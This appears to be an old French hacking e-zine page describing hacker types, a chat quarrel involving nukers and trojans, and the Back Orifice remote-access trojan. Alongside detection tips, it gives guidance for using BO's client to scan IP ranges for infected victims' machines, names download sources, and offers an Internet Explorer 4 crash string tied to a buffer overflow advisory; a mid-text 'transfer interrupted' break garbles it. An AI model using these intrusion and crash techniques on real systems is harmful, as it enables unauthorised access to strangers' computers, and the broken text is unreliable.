<HTML>
<HEAD>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
   <META NAME="Author" CONTENT="Marc PETREMANN">
   <META NAME="GENERATOR" CONTENT="Mozilla/4.03 [fr] (Win95; I) [Netscape]">
   <TITLE>2020hackers</TITLE>
</HEAD>
<BODY>
<IMG SRC="ra.gif" HEIGHT=48 WIDTH=48>
<CENTER><FONT SIZE=+4><FONT COLOR="#000000">H</FONT>ACKER 2020</FONT></CENTER>

<CENTER>&nbsp;</CENTER>
1- Introduction
<BR>2- Un hacker... c'est quoi au juste?
<BR>3- Savoir reconnaitre un hacker et devenir hacker
<BR>4- Back Orifice
<BR>5- Astuces de hacking
<BR>6- Articles divers sur le hacking, les mesures prises contres, les
groupes anti-hackers, etc... (source de diff&eacute;rents journaux )
<BR>&nbsp;

<P><FONT SIZE=+2>Avertissement</FONT><FONT SIZE=+1>: toutes les informations
fournies sur cet E-mag sont &agrave; titres purement &eacute;ducatif. Il
vous est d&eacute;conseill&eacute; de les utiliser sous peine d'amendes
et poursuites judiciaires. Tous ce que vous ferez ne saurait m'en inqui&eacute;ter
et m'en rendre comme responsable! La libre diffusion de cet E-mag est autoris&eacute;e
&agrave; condition qu'elle soit dans un but informatif.</FONT>
<CENTER>&nbsp;</CENTER>

<CENTER><FONT SIZE=+1>----- 1&deg;/ Introduction -----</FONT></CENTER>


<P>&nbsp;&nbsp;&nbsp; Le hacking est un ph&eacute;nom&egrave;ne qui touche
de plus en plus de gens partout dans le monde! De plus en plus de gens
sont int&eacute;ress&eacute;s par cet mentalit&eacute; qu'est celle du
hacking... Nombre de personnes r&ecirc;veraient de devenir hacker. Et nombre
de personnes se font une muvaise image du hacker en g&eacute;n&eacute;ral.
Car en effet il faut diff&eacute;rencier les types de pirates: Il y a:
<BR>&middot; <U>Les crashers:</U> les crashers sont de dangeraux pirates
qui d&eacute;truisent tout pour le plaisir... cette mentalit&eacute; est
peut-&ecirc;tre l'une des moins r&eacute;pandues, car il faut savoir que
les crashers sont tr&egrave;s souvent ha&iuml;s par le milieu du piratage.
A &eacute;viter donc.
<BR>&middot; <U>Les crackers:</U> ils sont l&agrave; pour cracker les programmes
(<U>ex:</U> enlever le passworrd d'un file en le d&eacute;sassemblant pour
le diffuser ensuite sur internet). Les crackers ne sont pas fondamentalement
dangereux. les tr&egrave;s bons crackers sont de v&eacute;ritables g&eacute;nies
(il faut le dire) de la programmation. sans eux le r&eacute;seau internet
ne serait pas ce qu'il est maintenant.
<BR>&middot; <U>Les lamers:</U> en g&eacute;n&eacute;ral ce sont les d&eacute;butants
dans le milieu du piratage... Ce sont souvent les "bizus" des &eacute;lites!
Si vous d&eacute;butez dans le milieu du H/P/C/V (hacking, cracking, phreaking
etc...)essayez d'acqu&eacute;rir un certain niveau de connaissance seul...
en g&eacute;n&eacute;ral les &eacute;lites du dessus n'h&eacute;siteront
pas &agrave; vous filer un ou deux trojans entre quelques programmes. sauf
si c'est quelqu'un que vous connaissez bien ou qui est votre ami.
<BR>&middot; <U>Les phreakers:</U> le phraker est un pirate du r&eacute;seau
t&eacute;l&eacute;phonique en g&eacute;n&eacute;ral... Mais il peut aussi
pirater sa borne EDF, graver des cd crack&eacute;s etc... En g&eacute;n&eacute;ral
les phreakers se m&ecirc;lent rarement au milieu du hacking. Tout ce qui
concerne le piratage de la ligne t&eacute;l&eacute;phonique du voisin pour
se faire des minutes gratos &ccedil;a les concerne!
<BR>&nbsp;&middot; <U>Les hackers:</U> ce sont les pirates du net... Les
meilleurs du hacking sont quasiment inconnus. Jusqu'au jour ou ils pratent
le Pentagone et qu'ils se font choper! La moyenne d'&acirc;ge des hackers
tourne entre 15 et 25 ans. Ils piratent n'importe quoi. Par simple d&eacute;fi.
Par pur plaisir. Les hackers s'attaquent rarement aux autres internautes!
Mais m&eacute;fiez vous! Les hackers sont un peu crashers dans leur c&ocirc;t&eacute;
obscur.

<P>&nbsp;&nbsp; Donc c'est surtout des hackers dont nous parlerons. Il
faut savoir que les m&eacute;dias donnent une mauvaise image du hacking,
en faisant des articles diffamateurs ou en m&eacute;diatisant le mauvais
c&ocirc;t&eacute; du hacking. Les m&eacute;dias profitent de l'ignorance
que les gens ont sur le piratage pour d&eacute;truire la VERITABLE image
du hacker! Sans les hackers allez savoir si votre r&eacute;seau internet
existerait! Internet &eacute;tait au d&eacute;part un r&eacute;seau militaire.
Mais les universitaires et les scientifiques en ont fait le r&eacute;seau
internet. Et pas les m&eacute;dias (qui font jamais bien leur boulot d'ailleurs
:-))! Des universitaires! Donc tout &ccedil;a pour vous dire que ce que
les m&eacute;dias pourront vous raconter sur le piratage informatique ne
sera pas toujours juste. Mais si on a tendance a penser que un hacker est
un dangereux criminel, celui-ci aura tendance a se criminaliser; c'est
psychologique. Mais les hackers sont loins d'&ecirc;tres tous dangereux...
certains hackent m&ecirc;me pour prouver que aucun syst&egrave;me de s&eacute;curit&eacute;
ou syt&egrave;mes d'exploitation n'est infaillible. ce qui nous permet
de d&eacute;montrer que Windows est une vrai "passoire" (pardonnez l'expression).
Ainsi on pourrait s'imaginer que certains trous de s&eacute;curit&eacute;
sont volontaires. D'ailleurs Microsoft a fait en sorte que Money99 (qui
n'est pas encore officiellement sorti) ne marche que si Microsoft Intenet
Explorer 4 est install&eacute;! Les accusations qui se font au sujet de
Bill Gates, comme quoi son but serait de d&eacute;tenir tout le march&eacute;
de l'informatique, peuvent &ecirc;tre consid&eacute;r&eacute;es comme vrai!
Pas &agrave; 100%. Mais il faut avouer que Microsoft est ce qu'est Coca-Cola
par rapport &agrave; la grenadine. Les statistiques d&eacute;montrent que
Microsoft d&eacute;tient environ + de 90% du march&eacute; informatique,
mais... pouvons nous incriminer Bill Gates? car si vous &ecirc;tes pas
content y'a toujours Linux ou Unix! Et vous devez aussi avoir Netscape
Navigator sur votre b&eacute;cane, non? Bref pour clore cette introduction
je tiens quand m&ecirc;me &agrave; vous dire que, bien que les m&eacute;dias
arrangent les faits &agrave; leur mani&egrave;re, ceux-ci ne sont jamais
forc&eacute;ment erron&eacute;s.
<BR>&nbsp;
<CENTER><FONT SIZE=+1>----- 2&deg;/ Un hacker... c'est quoi au juste? -----</FONT></CENTER>


<P>&nbsp;&nbsp;&nbsp; Ben... comment vous expliquer &ccedil;a. Un hacker
(je vais faire quand m&ecirc;me un petit r&eacute;capitulatif de ce qui
a &eacute;t&eacute; vu plus haut), c'est un pirate qui essaie de d&eacute;couvrir
les failles de chaque syst&egrave;me, c'est quelqu'un qui cr&eacute;&eacute;
des programmes de piratage etc..., par simple d&eacute;fi. Pas pour le
fric (pas toujours: la tune tombe pas des arbres). Bref... Les hackers
forment aussi une "communaut&eacute;" ou l'on se doit d'&ecirc;tre solidaire...
Les hackers se tapent rarement dessus. Mais le hacking c'est aussi une
mantalit&eacute;. Une volont&eacute;. On ne se lance pas dans le hacking
pour d&eacute;conner. Non... En g&eacute;n&eacute;ral on va jusqu'au bout.
Rares sont ceux qui ont abandonn&eacute; en cours de route. Il y a tellement
de choses &agrave; d&eacute;couvrir dans le monde du piratage que cela
revient &agrave; en d&eacute;couvrir un nouveau monde: l'autre c&ocirc;t&eacute;
de l'utilisation d'un ordinateur. Pas forc&eacute;ment le c&ocirc;t&eacute;
obscur de l'utilisation d'un ordinateur mais surtout les possibilit&eacute;s
que ce c&ocirc;t&eacute; peut nous offrir (si vous voyez ce que je veux
dire!). Il faut savoir qu'il y a diff&eacute;rents aspects dans le hacking!
On peut facilement se les imaginer: &eacute;tudes des diff&eacute;rents
syst&egrave;mes de s&eacute;curit&eacute;, cr&eacute;ation de programmes,
piratage du pc d'un pauvre internaute etc... en g&eacute;n&eacute;ral les
tr&egrave;s bons hackers sont appel&eacute;s: Elite et sont quasiment inconnus!
Si jamais vous en rencontrez un ou que vous avez judicieusement su en reconnaitre
un, eh ben gardez &ccedil;a pour vous. Rien de pire que de s'attirer des
emmerdes, de toute la communaut&eacute; hacker, qu'en d&eacute;noncant
" un de l'&eacute;lite". Mais un hacker c'est aussi une personne comme
vous et moi! On ne doit pas s'imaginer que parce que une personne&nbsp;
pirate elle se diff&eacute;rencie forc&eacute;ment de la soci&eacute;t&eacute;
dans laquelle vous vivez. Elle est contribuable, regarde la t&eacute;l&eacute;
(Eh oui! Ca lui arrive!), dort dans un lit, etc... mais un hacker c'est
aussi une personne aimable, courtoise et pas forc&eacute;ment belliqueuse!
Loin de toutes les id&eacute;es re&ccedil;ues ce serait plut&ocirc;t le
contraire: tendance pacifique. Mais bon... Y'a des exceptions hein! Faudrait
pas s'faire des illusions! (on va finir par croire que je contredis ce
que j'&eacute;cris!)

<P>&nbsp;
<CENTER><FONT SIZE=+1>----- 3&deg;/ Savoir reconnaitre un hacker et devenir
hacker -----</FONT></CENTER>
&nbsp;&nbsp; Bon... Il faut savoir que ce sera pour vous un honneur si
vous rencontrez dans votre vie une personne de l'&eacute;lite (c.f. para
2&deg;/). Donc il sont tr&egrave;s tr&egrave;s difficilement reconnaissable,
de plus c'est pas lui qui vous le dira! Comptez pas l&agrave;-dessus! Il
vous faudra vous contenter de reconnaitre les hackers (je dirais pas les
moyens), mais ceux qui ont d&eacute;pass&eacute; ce stade de d&eacute;butant.
Ceux qui savent des trucs, ceux qui peuvent vous apprendre des trucs mais
pas des d&eacute;butants (bien qu'il ne sache pas tout). Donc je vais vous
expliquer comment reconnaitre un hacker... Mais d'abord un petit point
que je voudrais &eacute;claircir... J'avais lu un e-mag qui disait: "pour
&ecirc;tre&nbsp; un hacker il faut mettre des 3 &agrave; la place des E,
des 5 &agrave; la pl>
<HR><H3>Transfert interrompu !</H3>
 0, de mettre
des Z &agrave; la fin de chaque mot au pluriel etc..." ce qui pouvait donnait
des phrases totalement absurdes. Cet E-mag disait aussi qu'un hacker est
fier d'avoir une orthographe compl&egrave;tement nulle et il le montre.
Inutile de vous dire que ces informations m'ont donn&eacute; envie de vomir.
rien de pire que de prendre les gens pour des cons. Si une personne arrive
sur le chat avec une orthographe pas possible et une &eacute;criture de
d&eacute;ment, inutile de vous poser trop de questions: CETTE PERSONNE
N'EST PAS HACKER ET ELLE LE MONTRE. Rien de moins s&eacute;rieux qu'une
personne faisant expr&egrave;s d'avoir une orthographe &eacute;xecrable
et une &eacute;criture pas possible. Car un hacker (en g&eacute;n&eacute;ral)
est quelqu'un de s&eacute;rieux et essaie d'avoir au maximum la meilleure
orthographe et &eacute;criture possible! Mais on peut aussi se dire que
l'habit ne fait pas le moine. Que les hackers n'ont pas forc&eacute;ment
une bonne orthographe. c'est vrai! Il ne faut pas pr&eacute;juger! mais
sachez faire la diff&eacute;rence.&nbsp; Mais inutile de vous dire que
si un mec arrive sur un chat en gueulant &agrave; qui veut l'entendre:
"Je suis hacker! Je suis le meilleur des pirates" et autres insanit&eacute;s,
cette personne n'a m&ecirc;me pas du se poser la question une fois dans
sa vie, ce qu'&eacute;tait un hacker... encore un blaireau... Inutile de
demander son chemin &agrave; cette esp&egrave;ce l&agrave;! Il y a aussi
le mec qui r&eacute;pond n'importe quoi ou qui se ram&egrave;ne avec des
nicks trop &eacute;vidents (<U>ex:</U> hack-man), qui lui doit en savoir
un peu plus que l'autre blaireau mais bon... Un peu trop orgueuilleux!
Parce que je vais vous raconter une anectdote: j'connais un mec qui s'est
ramen&eacute; sur le chat en beuglant: "Je suis un pirate! Je suis un hacker!".
Obligatoirement je lui ait demand&eacute; de me le prouver. Je n'attendais
aucune r&eacute;ponse bien s&eacute;rieuse de sa part. D'ailleurs je n'en
ait pas eu. ce mec j'ai r&eacute;ussi &agrave; trouver son UIN, son IP
et tout le bla-bla... alors au d&eacute;but je lui ait parl&eacute; piratage
(sur icq), histoire de voir s'il en connaissai un bout... J'lui ait envoy&eacute;
des files pour qu'il puisse se demmerder (parce que je me suis tout de
m&ecirc;me aper&ccedil;u qu'il ne savait rien! MAIS RIEN DU TOUT! Mais
bon... comme il &eacute;tait int&eacute;ress&eacute;...), et apr&egrave;s
il m'a dit (je vais reproduire le dialogue):
<BR>&lt;M(je garde le nom secret, par respect)> comment on fait pour lire
ton file???
<BR>&lt;Clad Strife> ben... tu le d&eacute;zipes et tu lis le txt!
<BR>&lt;M> c'est quoi un txt?
<BR>&lt;Clad Strife> Tu sais m&ecirc;me pas &ccedil;a? ohl&agrave;l&agrave;!
c'est un document texte!
<BR>&lt;M> Ahh! Et pour le d&eacute;zipper? Coment k'on fait?
<BR>&lt;Clad Strife> tu cliques 2 fois rapidement sur le logo!
<BR>&lt;M> Ah! *user is away*
<BR>&lt;Clad Strife> Ca marche?
<BR>&lt;M> *user is away*
<BR>&lt;Clad Strife> hoh&eacute;!!! (l&agrave; je fais ctrl+G ( &ccedil;a
fait du bruit chez l'autre)! On aurait dit que le mec se serait endormi
sur son clavier; le *user is away* signifiant qu'il est plus sur le chat)
<BR>&lt;M> Ouais et ben ca marche po! (le con savait pas d&eacute;zipper)
<BR>&lt;Clad Strife> Putain! t'es naze comme mec!
<BR>&lt;M> ohoh! calme toi! Je te signale que j'ai des trucs qui font male
tr&egrave;s male!!! (il venait de t&eacute;l&eacute;charger un nuker et
Nonuker! Alors il essaie de me nuker! Le fire-wall d&eacute;tecte!&nbsp;
Je chope son IP! Je bloque l'attaque, puis je sors un autre nuker, je le
nuke sur un autre port que le 139, mais son anti-nuker d&eacute;tecte.
A&Iuml;E!)
<BR>&lt;Clad Strife> t'es vraiment nul! Connard! t'as un nuker et tu te
crois le boss des hackers! l'&eacute;lite! tu me fais piti&eacute;! pff!
<BR>&lt;M> Tais-toi sinon je te fais tr&egrave;s mal! J'ai des trucs qui
bousillent! (bien sur il a que dalle!)
<BR>&lt;Clad Strife> C'est vrai? Oh non! Piti&eacute;! Pas &ccedil;a! hahahahahahahahaha!
Ben vas-y essaie! J'ai envie de rire! Tu me fais hurler de rire t'es un
bouffon!
<BR>&lt;M> Tais-toi sinon j'appele mon copain! c'est lui qui m'a fil&eacute;
les programes!!!*
<BR>&lt;Clad Strife> Encore un blaireau...
<BR>&lt;M> oh et puis merde j'me casse! t'es trop con! Enfoir&eacute;
<BR>*User has left the chat*

<P>Bon eh ben lui il m'a grave fait chier! Sauf que j'appris par la suite
que son copain c'&eacute;tait J (secret aussi), un de mes potes qui entre
deux nukers lui avait fil&eacute; un trojan! Alors... ce mec si vous le
rencontrez et que vous reconnaissez sa mani&egrave;re de faire, n'h&eacute;sitez
pas &agrave; lui "foutre un pain sur la gueule"! J'avais manqu&eacute;
de tact ce jour l&agrave; mais bon... De plus j'avais son tel. Il a pass&eacute;
un sale quart d'heure! Il a plus recommence. Mais si je vous raconte cette
anectdote c'est pas pour rien. C'est pour vous d&eacute;montrer que des
gros cons (pardonnez l'injure mais &ccedil;a d&eacute;foule) orgueuilleux
y'en a
<BR>partout! Revenons &agrave; nos moutons... J'ai souvent vu marqu&eacute;
qu'un vrai hacker se devait d'avoir Linux (dans d'autres E-mags Unix),
si il voulait devenir un VRAI hacker... Mais pour en revenir &agrave; notre
premier E-mag (c.f. d&eacute;but chapitre), celui-ci disait: "vous devez
aoir Linux sinon c'est inutile d'essayer d'&ecirc;tre hacker. L&agrave;
j'ai vomi :-). Comment peut-on dire des choses aussi absurdes! On peut
tr&egrave;s bien &ecirc;tre hacker et ne pas &ecirc;tre sous Linux ou Unix!
Pourquoi pas sous Windows95 ou Windows98! Moi je suis sous Windows95 et
j'en suis fier! Bien que Linux n'est absolement pas n&eacute;gligeable
pour hacker! Mais de l&agrave; &agrave; dire que c'est l'outil qu'on se
DOIT d'avoir, l&agrave; non!!! Rien de plus faux! je le dis, je le r&eacute;p&egrave;te!
Et je continuerais de le r&eacute;p&eacute;ter! J'avais aussi remarqu&eacute;
que les hackers (les bons et les d&eacute;butants), mettaient souvent des
petits signes distinctifs, dans certains mots, tel que: Micro$oft ou transformait
des mots pour en faire des: zindaube, winfuke, microdobe, etc... Nous sommes
loin des crit&egrave;res d&eacute;biles du E en 3 et du O en 0! Non...
L&agrave; &ccedil;a a surout un caract&egrave;re humouristique qui tient
&agrave; d&eacute;montrer que l'on se moque bien de windows et de ses trous
de s&eacute;curit&eacute;!
<BR>donc pour se d&eacute;marquer de tous ces d&eacute;biles qui prenne
&ccedil;a &agrave; la l&eacute;g&egrave;re! Je vais aborder un autre type
de personnes qui existent: les lamers (c.f.: chapitre1). Les lamers sont
loin d'&ecirc;tre des gros cons... Au contraire. ce sont en g&eacute;n&eacute;ral
des personnes qui d&eacute;butent dans le milieu! Il n'est pas exclu de
les aider! Il sauront vous le rendre t&ocirc;t ou tard! Les lamers disent
qu'ils aimeraient &ecirc;tre hacker et demanderont au premier venu de leur
enseigner pour peu que celui-ci s'y connaisse un peu. c'est pourquoi, vous
recevrez souvent des messages de lamers qui vous demanderont de leur apprendre
le hacking. Evitez de les envoyer balader! Il vous on rien fait ;-). Vous
aussi vous avez &eacute;t&eacute; lamers au tout d&eacute;but de votre
p&eacute;riode! Vous aussi vous avez demand&eacute; &agrave; des gens de
vous apprendre! Alors??? Bref... Essayez de vous d&eacute;marquer des blaireaux
sans pour autant ne pas vous amuser &agrave; glisser un petit Zindaube
dans la conversation :-)!!! (Non. en fait je dis &ccedil;a car j'aimais
pas trop qu'on m'envoie promener au d&eacute;but de mon apprentissage!)
<BR>&nbsp;
<CENTER><FONT SIZE=+1>----- 4&deg;/ Back Orifice -----</FONT></CENTER>
&nbsp;&nbsp; Bon alors l&agrave; on va aborder un point sp&eacute;cial
du piratage! qu'est ce qu'est Back Orifice (BO) et qu'est ce qu'est Netbus?
Back Orifice est un programme, qui s'utilise avec un trojan, invent&eacute;
par cDc (Cult of the Dead Cow). Le but est simple: infecter la machine
de la victime pour rentrer avec son IP, sur la b&eacute;cane de la victime,
&agrave; l'insu du plein gr&eacute; de la victime! A premi&egrave;re vue
cel&agrave; ressemble &agrave; un trojan comme un autre... ce que vous
ne savez pas c'est que vous &ecirc;tes peut-&ecirc;tre infect&eacute;!!!
Alors??? Comment savoir si vous &ecirc;tes malencontreusement infect&eacute;!
Si vous l'avez &eacute;x&eacute;cut&eacute; &agrave; l'&eacute;tat brut,
c'est &agrave; dire non modifi&eacute; et &eacute;x&eacute;cut&eacute;
tel quel, il devrait s'installer (le trojan qui porte le nom de <I>BOSERVE.exe)
</I>dans le r&eacute;pertoire: C:\WINDOWS\SYSTEM Si il a &eacute;t&eacute;
&eacute;x&eacute;cut&eacute; vous verrez un fichier du nom de: "rien".exe.
Le "rien" signifiant bien &eacute;videmment qu'il n'y a rien; c'est &agrave;
dire que vous verrez marqu&eacute;: .exe (environ 122 ko)! Et si vous regardez
dans la base de registre de votre ordi,&nbsp; et que vous constatez qu'une
nouvelle cl&eacute; est apparue dans HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\RunServices,
correspondant au d&eacute;clenchement de BO lors du d&eacute;marrage du
syst&egrave;me, c'est que vous &ecirc;tes infect&eacute;. Mais il ne s'agit
l&agrave; que des toutes premi&egrave;res versions de BO! Cela peut &ecirc;tre
tout &agrave; fait diff&eacute;rent pour les nouvelles variantes, qui peuvent
&ecirc;tre &eacute;x&eacute;cut&eacute;es par une ligne de Javascript ou
un ActiveX dans une page web. Il existe m&ecirc;me des utilitaires comme
SilkRope qui "cachent" BO derri&egrave;re un autre programme: jeux, programmes,
d&eacute;mo, etc... Mais il existe d'autres utilitaires encore plus vicieux!
Tels que Saran Wrap qui peut offrir la possibilit&eacute; de cacher BO
derri&egrave;re un InstallShield, ce qui rend par la suite sa d&eacute;tection
et son &eacute;l&eacute;mination tr&egrave;s tr&egrave;s probl&eacute;matiques!
Dans ce cas il vous faudra le plus couramment faire une r&eacute;installation
du syt&egrave;me! (ARGH! Mais c'est vraiment vicieux!). Quels sont les
caract&eacute;ristiques qui vous permettront de savoir que vous &ecirc;tes
infect&eacute;s: affichage de bo&icirc;te de dialogues louches (avec des
messages qui disent n'importe quoi), supression de files, d&eacute;zippage
de files et compression de files, rebootage du pc, ralentissement au niveau
du HD (Hard disk, c'est le disque-dur, mais paniquez pas! Un disque qui
rame c'est toujours pareil!), &eacute;x&eacute;cution de programmes, etc...
M&ecirc;me des trucs que vous pouvez pas faire vous! Si il y a un de ces
symptomes qui apparaissent alors plusieurs solutions s'offrent &agrave;
vous:
<BR>formater le disque (mais ne soyons pas suicidaires!), notroyen et bouffetroyen,
anti-virus (le dernier Norton Anti-Virus), r&eacute;installation du syst&egrave;me
etc... Il y en a d'autres MAIS SURTOUT PAS BOSNIFFER.exe QUI EST EN FAIT
BOSERVE DEGUISE! A vous de faire ce qui vous semble le mieux! Il y a aussi
l'anti BO en la mati&egrave;re! Qui se pr&eacute;sente sous le nom de NOBO.exe!
Il est en t&eacute;l&eacute;chargement sur&nbsp; http://web.cip.com/br/nobo
! A avoir absolument! Si quelqu'un vous ping (la personne met votre ip
dans bogui qui est le programme pour forcer le pc), l'attaque sera imm&eacute;diate
ment bloqu&eacute;e et l'ip vous sera donn&eacute;! Un message s'affichera
sur l'&eacute;cran de bogui du criminel!
<BR>Voil&agrave; comment se pr&eacute;sente votre fen&ecirc;tre NOBO si
quelqu'un vous ping!
<CENTER><IMG SRC="nobo1.gif" BORDER=0 HEIGHT=225 WIDTH=481></CENTER>

<CENTER><FONT SIZE=-1>(ici il y a eut un ping sur le port 31337, et l'IP
de la personne est: 208.216.166.72 qui a ping&eacute; &agrave; 22:28:30
au 05/11/98)</FONT></CENTER>


<P>&nbsp;&nbsp; Donc voil&agrave; comment se pr&eacute;sente votre fen&ecirc;tre
NOBO qui s'ouvrira automatiquement au premier ping. En g&eacute;n&eacute;ral
1/3 des personnes qui utilise BO sont elles m&ecirc;me infect&eacute;es!
Maintenant il vous gaudra savoir ou t&eacute;l&eacute;charger BO120.zip.
L'url du site de cDc (o&ugrave; est en t&eacute;l&eacute;chargement BO)
est: http://www.cultdeadcow.com/tools/bo.html. Mais revenons &agrave; nos
moyens de d&eacute;tection de BO!
<BR>(La suite de ce texte est vaguement inspir&eacute; du Pirates MAG'
N&deg;2). Bon ce qu'il faut savoir: (et &ccedil;a c'est mo&eacute; qui
le dit). Il existe une commande netstat que l'on peut faire sous dos. Cette
commande permet de surveiller les ports actifs de votre b&eacute;cane!
Vous allez voir le rapport entre &ccedil;a et BO! Je m'explique: on peut
trouver des quantit&eacute;s de programmes cens&eacute;s d&eacute;tecter
et d&eacute;truire Back Orifice. Mais la pluspart du temps, ces logiciels
ne peuvent que d&eacute;tecter la version de base avec sa configuration
par d&eacute;faut (port 31337, pas de mot de passe), ou encore que dalle,
ou encore vous filer BOSERVE comme BOSNIFFER. ceci est insuffisant et dangereux:
on peut se croire faussement prot&eacute;g&eacute;. N'esp&eacute;rez pas
d&eacute;tecter la pr&eacute;sence d'un serveur (=trojan) sur votre pc
en utilisant seulement le client, car, l&agrave; encore, il faut connaitre
le num&eacute;ro de port par lequel le serveur communique avec le client
(programme qui permet de p&eacute;n&eacute;trer votr pc). Il faut savoir
que BO peut communiquer avec le client sur tous les ports possibles. De
ce fait, une recherche exhaustive va prendre environ une dizaine de minutes.
Ce laps de temps est largement suffisant pour qu'un pirate fasse ce qu'il
veut de la machine cible. des anti-virus, comme Norton, d&eacute;clarent
dans leur derni&egrave;re version de pouvoir d&eacute;tecter BO avant m&ecirc;me
son installation... Oui, mais il ne leur est pas possible de d&eacute;tecter
toutes les variantes, pour la bonne et simple raison qu'il en appara&icirc;t
sans cesse. Et ) propos de virus, rien n'emp&ecirc;che de compbner la posssibilit&eacute;
d'autoreplication d'un virus avec BO (le truc qui fait mal aux dents!).
En fait la fa&ccedil;on la plus simple de surveiller l'&eacute;tat des
connexions R&eacute;seau d'un pc est la commande NETSTAT. Elle permettra
de savoir tout ce qui entre ou sort de la machine sur laquelle elle est
lanc&eacute;e. Supposons que nous ayons affaire &agrave; un BO de base
avec ses options par d&eacute;faut (port 31337). si vous tapez dans ue
fen&ecirc;tre Dos: netstat -an I find "UDP", vous obtiendrez: UDP 0.0.0.0:31337,
ceci indique qu'une application est en train d&eacute;couter tout ce qui
arrive sur le port 31337, on peut donc avoir un gros soup&ccedil;on!!!
Eventuellement, le propri&eacute;taire du pc pourra d&eacute;tecter une
activit&eacute; suspecte (BO communiquant avec le client). Mais attention:
le pirate&nbsp; peut aussi tr&egrave;s bien remplacer NETSTAT.exe par une
version qui ne le trahira point ou m&ecirc;me plus vicieux: incorporer
le serveur (boserve) &agrave; NETSTAT! Ah oui, un dernier d&eacute;tail
pour achever de vous faire froid dans le dos: rien n'emp&ecirc;che que
plusieurs versions de BO tournent en m&ecirc;me temps sur votre machine.
Et puisqu'il ne serait pas juste que seules les victimes potentielles aient
peur: sachez chers utilisateurs de BO, que toutes les donn&eacute;es r&eacute;cup&eacute;r&eacute;es
par le client sont envoy&eacute;es vers l'adresse IP 209.25.3.113: vous
&ecirc;tes donc surveill&eacute;s. de plus l'utilisation de BO est formellement
interdite par la loi et saurait &ecirc;tre passible de poursuites judiciaires.
Vous voil&agrave; pr&eacute;venus.

<P>Bon maintenant parlons de Back Orifice et de son utilisation. Si vous
cherchez bien sur le net vous trouverez facilement des: "comment t&eacute;l&eacute;charger
BO, t&eacute;l&eacute;charger BO ici et maintenant, la vraie version de
BO en t&eacute;l&eacute;chargement, etc...". Mais m&eacute;fiez vous des
contrefa&ccedil;ons! Qu'est ce qui vous garantit que votre cher BO en t&eacute;l&eacute;chargement
n'est pas un virus ou boserve (qui est le trojan)? Ben va falloir apprendre
&agrave; distinguer les vraies versions des fausses! Si vous t&eacute;l&eacute;charger
BO sur le net il faut savoir que le zip s'appelle: bo120.zip, sinon vous
virez! BO est trop dangereux pour qu'on prenne &ccedil;a &agrave; la l&eacute;g&egrave;re!
Le zip de Back Orifice fait 278 ko. Et voil&agrave; comment se pr&eacute;sente
la fen&ecirc;tre de d&eacute;compression de BO:

<P><IMG SRC="cap4.jpg" HEIGHT=480 WIDTH=640>

<P>Alors ici on remarque plusieurs sortes de programmes: bogui, boserve,
boclient etc... Tout vous sera expliqu&eacute; dans la notice du nom de
"bo.txt". IL NE FAUT SURTOUT PAS EXECUTER BOSERVE (je me r&eacute;p&egrave;te
mais on est jamais trop prudent!). Si vous ne le savez toujours pas: boserve
est le trojan, plus couramment sous le nom qu'on donne au terme g&eacute;n&eacute;ral
de "trojan", c'est le serveur. Bogui et boclient sont les programmes qui
communiquent avec le serveur, appel&eacute;s plus couramment clients. les
autres programmes sont moins importants. Si vous connaissez une personne
infect&eacute;e par le serveur alors &eacute;x&eacute;cutez bogui et rentrer
son IP, puis faites: ping host. Si la personne r&eacute;pond &agrave; l'autre
bout un message : "!PONG!"+ le nom de l'utilisateur s'affichera sur votre
fen&ecirc;tre bogui. Mais comment savoir si c'est bien bogui que vous regardez?
Simple bogui resssemble &agrave; ceci une fois &eacute;x&eacute;cut&eacute;:

<P><IMG SRC="cap5.jpg" HEIGHT=480 WIDTH=640>

<P>&nbsp;Donc si c'est ce que vous voyez, plus de dute, vous avez bien
la bonne version! Je vous passe les d&eacute;tails d'utilisation de BO
car tout vous sera expliqu&eacute; dans la doc. Mais sachez que vous pouvez
scanner tous les gens dont l'IP commence par un certain nombre (l&agrave;
c'est confus et je m'explique). Imaginez que vous ayez personne &agrave;
pinger. Le meilleur moyen de ping et d'avoir plus de chnaces de tomber
sur des personnes infect&eacute;es et de rentrer dans "target:host port
cet IP (par exemple): 193.193.*.* bogui s'amusera alors &agrave; scanner
tous les IP commen&ccedil;ant par: 193.193 ce qui vous donne une grande
marge. Mais le scanne sera long il sera plus utile de faire: 193.193.193.*,
vous avez moins de chances de trouver d'infect&eacute;s mais le scann se
fera plus vite. Bogui scane le port par d&eacute;faut (c'est &agrave; dire
31337). Seules les personnes infect&eacute;es sur ce port r&eacute;pondront
par PONG. Mais si vous scannez toute une s&eacute;rie d'IP en faisant *.*
et que dans cette s&eacute;rie se trouve un IP d'utilisateur qui poss&egrave;de
NOBO, alors la personne usant de NOBO aura votre IP et vous verrez un message
s'afficher dans la partie d'&eacute;crit. Il faut savor que de plus en
plus de gens ont NOBO; ce qui n'a pas pour but de faciliter l'utilisation
de BO.
<BR>&nbsp;
<CENTER><FONT SIZE=+1>----- 5&deg;/ Astuces de hacking -----</FONT></CENTER>
&nbsp;&nbsp; - Vous d&eacute;testez Microsoft? Vous d&eacute;testez IE4?
Eh ben alors apprenez &agrave; planter MSIE4. Tapez dans la barre d'url:
res://xxxxxxxx (+356x)xxx. et tapez enter. Oh! le navigateur s'est ferm&eacute;!
Il semblerait m&ecirc;me qu'on puisse &eacute;x&eacute;cuter un programme
&agrave; l'insu du plein gr&eacute; de l'utilisateur. Personellement j'ai
essay&eacute; mais sans succ&egrave;s. A vous de trouver comment. En fait
voil&agrave; ce que donne le texte en anglais:

<P><FONT SIZE=-1>&nbsp;========</FONT>
<BR><FONT SIZE=-1>&nbsp;Scenario</FONT>
<BR><FONT SIZE=-1>&nbsp;========</FONT>

<P><FONT SIZE=-1>&nbsp; The Microsoft Internet Explorer 4.0 Suite, including
all programs supplied</FONT>
<BR><FONT SIZE=-1>&nbsp; with it that read and/or process HTML from either
local machines, intranet</FONT>
<BR><FONT SIZE=-1>&nbsp; machines, or remote internet machines are subject
to a buffer overflow in the</FONT>
<BR><FONT SIZE=-1>&nbsp; HTML decoding process. The buffer overflow can
cause the application to page</FONT>
<BR><FONT SIZE=-1>&nbsp; fault, or in the worst case, execute arbitrary
precompiled native code.</FONT>

<P><FONT SIZE=-1>&nbsp;=======</FONT>
<BR><FONT SIZE=-1>&nbsp;Example</FONT>
<BR><FONT SIZE=-1>&nbsp;=======</FONT>

<P><FONT SIZE=-1>&nbsp; 1. Copy the supplied HTML file(s) into a location
that is accessible via the</FONT>
